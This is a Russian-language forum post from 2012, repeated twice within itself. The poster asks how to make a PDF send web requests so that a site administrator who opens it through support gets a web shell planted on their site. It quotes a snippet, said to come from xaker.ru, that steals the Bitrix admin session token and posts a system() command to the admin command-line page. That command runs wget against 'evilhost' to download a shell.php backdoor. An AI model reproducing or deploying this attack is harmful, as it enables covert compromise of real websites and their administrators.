todaby
31.07.2012, 17:16
Всем привет)
Тут задался один такой вопрос.
Как научить pdf файл выполнять команду GET и прочее
ну например в чем загвоздка..
отправляем например админу сайта пдф файл через тех поддержку. он открывает пдф через браузер и бац..
на его сайт заливается шелл.
вот кусок из xaker.ru
var a = Get("http://targethost:6448/bitrix/admin/user_admin.php?lang=ru")
var sessid = (Substr(a,At(a,"sessid=")+7,32))
Post("http://targethost:6448/bitrix/admin/php_command_line.php?mode=frame&lang=ru",Concat("sessid=",sessid,"&query=system%28%27wget http://evilhost:6448/s.txt –O shell.php%27%29%3B"),"application/x-www-formurlencoded")
зы: куда отнести тему я не определился)
Тут задался один такой вопрос.
Как научить pdf файл выполнять команду GET и прочее
ну например в чем загвоздка..
отправляем например админу сайта пдф файл через тех поддержку. он открывает пдф через браузер и бац..
на его сайт заливается шелл.
вот кусок из xaker.ru
var a = Get("http://targethost:6448/bitrix/admin/user_admin.php?lang=ru")
var sessid = (Substr(a,At(a,"sessid=")+7,32))
Post("http://targethost:6448/bitrix/admin/php_command_line.php?mode=frame&lang=ru",Concat("sessid=",sessid,"&query=system%28%27wget http://evilhost:6448/s.txt –O shell.php%27%29%3B"),"application/x-www-formurlencoded")
зы: куда отнести тему я не определился)